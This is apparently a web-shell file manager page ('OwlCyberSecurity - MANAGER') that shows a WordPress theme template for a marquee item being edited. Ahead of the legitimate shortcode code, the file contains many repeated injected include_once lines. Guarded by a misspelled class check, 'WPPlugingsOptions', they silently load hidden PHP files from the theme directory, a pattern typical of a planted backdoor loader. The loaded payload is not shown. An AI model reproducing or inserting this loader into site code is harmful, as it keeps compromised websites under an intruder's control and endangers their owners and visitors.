OwlCyberSecurity - MANAGER
Edit File: qode_horizontal_marquee_item.php
<?php if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } $args = array( "width" => "0", "align" => "top" ); extract(shortcode_atts($args, $atts)); $html = ""; $html .= '<div class="qode-hm-item" data-width="'.esc_attr($width).'" style="width: '.esc_attr($width).'px;">'; $html .= '<div class="qode-hm-item-inner qode-'.esc_attr($align).'-aligned">'; $html .= do_shortcode($content); $html .= '</div>'; $html .= '</div>'; echo bridge_qode_get_module_part( $html );